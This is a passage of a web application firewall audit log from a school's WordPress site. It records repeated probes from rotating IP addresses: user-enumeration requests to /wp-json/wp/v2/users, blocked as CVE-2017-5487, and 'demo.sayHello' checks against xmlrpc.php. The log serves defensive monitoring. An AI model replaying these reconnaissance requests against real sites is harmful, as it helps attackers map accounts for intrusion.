Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461641497861 6370 (- - -) Stopwatch2: 1746461641497861 6370; combined=4629, p1=615, p2=3770, p3=41, p4=44, p5=95, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a56124f-Z-- --0d4bab46-A-- [05/May/2025:23:14:33 +0700] aBjj6U2V_h1VFAgsfgZ97gAAAAs 103.236.140.4 50194 103.236.140.4 8181 --0d4bab46-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d4bab46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d4bab46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461673702755 2914 (- - -) Stopwatch2: 1746461673702755 2914; combined=1486, p1=529, p2=917, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d4bab46-Z-- --1fc1db4b-A-- [05/May/2025:23:14:36 +0700] aBjj7PZJDMuQndL03JNdxgAAAEw 103.236.140.4 50226 103.236.140.4 8181 --1fc1db4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1fc1db4b-C-- demo.sayHello --1fc1db4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fc1db4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461676614486 5109 (- - -) Stopwatch2: 1746461676614486 5109; combined=4092, p1=496, p2=3369, p3=29, p4=31, p5=102, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fc1db4b-Z-- --3fd4e930-A-- [05/May/2025:23:15:08 +0700] aBjkDE2V_h1VFAgsfgZ9_wAAAAw 103.236.140.4 50504 103.236.140.4 8181 --3fd4e930-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fd4e930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fd4e930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461708548750 2649 (- - -) Stopwatch2: 1746461708548750 2649; combined=1503, p1=517, p2=950, p3=0, p4=0, p5=36, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fd4e930-Z-- --aa011f3e-A-- [05/May/2025:23:15:11 +0700] aBjkD_ZJDMuQndL03JNd2AAAAEI 103.236.140.4 50544 103.236.140.4 8181 --aa011f3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa011f3e-C-- demo.sayHello --aa011f3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa011f3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461711276350 5174 (- - -) Stopwatch2: 1746461711276350 5174; combined=3669, p1=474, p2=2992, p3=30, p4=28, p5=85, sr=69, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa011f3e-Z-- --9f22e00e-A-- [05/May/2025:23:15:52 +0700] aBjkOE2V_h1VFAgsfgZ-IQAAABY 103.236.140.4 50976 103.236.140.4 8181 --9f22e00e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f22e00e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f22e00e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461752312421 2691 (- - -) Stopwatch2: 1746461752312421 2691; combined=1217, p1=410, p2=778, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f22e00e-Z-- --5dd93e60-A-- [05/May/2025:23:15:55 +0700] aBjkOwRwKNFSM6B7_LahewAAAJg 103.236.140.4 50996 103.236.140.4 8181 --5dd93e60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dd93e60-C-- demo.sayHello --5dd93e60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd93e60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461755243913 5531 (- - -) Stopwatch2: 1746461755243913 5531; combined=4096, p1=529, p2=3347, p3=33, p4=34, p5=90, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd93e60-Z-- --4d503257-A-- [05/May/2025:23:16:18 +0700] aBjkUk2V_h1VFAgsfgZ-KQAAABI 103.236.140.4 51208 103.236.140.4 8181 --4d503257-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d503257-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d503257-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461778258466 2426 (- - -) Stopwatch2: 1746461778258466 2426; combined=1372, p1=443, p2=898, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d503257-Z-- --4df68142-A-- [05/May/2025:23:16:21 +0700] aBjkVYZWvR7-42f6JrAObAAAAMw 103.236.140.4 51256 103.236.140.4 8181 --4df68142-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4df68142-C-- demo.sayHello --4df68142-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4df68142-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461781306180 5910 (- - -) Stopwatch2: 1746461781306180 5910; combined=4801, p1=570, p2=3987, p3=40, p4=44, p5=96, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4df68142-Z-- --d0d6a75d-A-- [05/May/2025:23:16:38 +0700] aBjkZk2V_h1VFAgsfgZ-OAAAAAQ 103.236.140.4 51428 103.236.140.4 8181 --d0d6a75d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d0d6a75d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0d6a75d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461798663149 2544 (- - -) Stopwatch2: 1746461798663149 2544; combined=1466, p1=473, p2=962, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0d6a75d-Z-- --c1afce59-A-- [05/May/2025:23:16:41 +0700] aBjkaU2V_h1VFAgsfgZ-PQAAAAY 103.236.140.4 51444 103.236.140.4 8181 --c1afce59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c1afce59-C-- demo.sayHello --c1afce59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1afce59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461801444507 5655 (- - -) Stopwatch2: 1746461801444507 5655; combined=4186, p1=514, p2=3453, p3=32, p4=34, p5=91, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1afce59-Z-- --06a8c17e-A-- [05/May/2025:23:16:47 +0700] aBjkb02V_h1VFAgsfgZ-SAAAAA0 103.236.140.4 51484 103.236.140.4 8181 --06a8c17e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --06a8c17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06a8c17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461807030340 2943 (- - -) Stopwatch2: 1746461807030340 2943; combined=1250, p1=399, p2=823, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06a8c17e-Z-- --8dc6326a-A-- [05/May/2025:23:16:49 +0700] aBjkcU2V_h1VFAgsfgZ-TQAAABc 103.236.140.4 51500 103.236.140.4 8181 --8dc6326a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8dc6326a-C-- demo.sayHello --8dc6326a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dc6326a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461809844578 5900 (- - -) Stopwatch2: 1746461809844578 5900; combined=4391, p1=517, p2=3596, p3=32, p4=34, p5=124, sr=73, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dc6326a-Z-- --6b1c735c-A-- [05/May/2025:23:17:11 +0700] aBjkh02V_h1VFAgsfgZ-VgAAABA 103.236.140.4 51680 103.236.140.4 8181 --6b1c735c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6b1c735c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1c735c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461831316316 2727 (- - -) Stopwatch2: 1746461831316316 2727; combined=1211, p1=411, p2=770, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1c735c-Z-- --ee16174c-A-- [05/May/2025:23:17:14 +0700] aBjkigRwKNFSM6B7_LahkgAAAIo 103.236.140.4 51708 103.236.140.4 8181 --ee16174c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee16174c-C-- demo.sayHello --ee16174c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee16174c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461834415762 4866 (- - -) Stopwatch2: 1746461834415762 4866; combined=4006, p1=467, p2=3211, p3=27, p4=30, p5=150, sr=70, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee16174c-Z-- --83a9ed09-A-- [05/May/2025:23:18:18 +0700] aBjkyk2V_h1VFAgsfgZ-gQAAAAk 103.236.140.4 52298 103.236.140.4 8181 --83a9ed09-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --83a9ed09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83a9ed09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461898189467 2175 (- - -) Stopwatch2: 1746461898189467 2175; combined=1181, p1=387, p2=765, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83a9ed09-Z-- --9976c37e-A-- [05/May/2025:23:18:21 +0700] aBjkzU2V_h1VFAgsfgZ-hgAAABI 103.236.140.4 52330 103.236.140.4 8181 --9976c37e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9976c37e-C-- demo.sayHello --9976c37e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9976c37e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461901300815 5568 (- - -) Stopwatch2: 1746461901300815 5568; combined=4105, p1=560, p2=3324, p3=32, p4=37, p5=91, sr=76, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9976c37e-Z-- --9ebcfa10-A-- [05/May/2025:23:20:14 +0700] aBjlPoZWvR7-42f6JrAOxwAAAMI 103.236.140.4 53412 103.236.140.4 8181 --9ebcfa10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ebcfa10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ebcfa10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 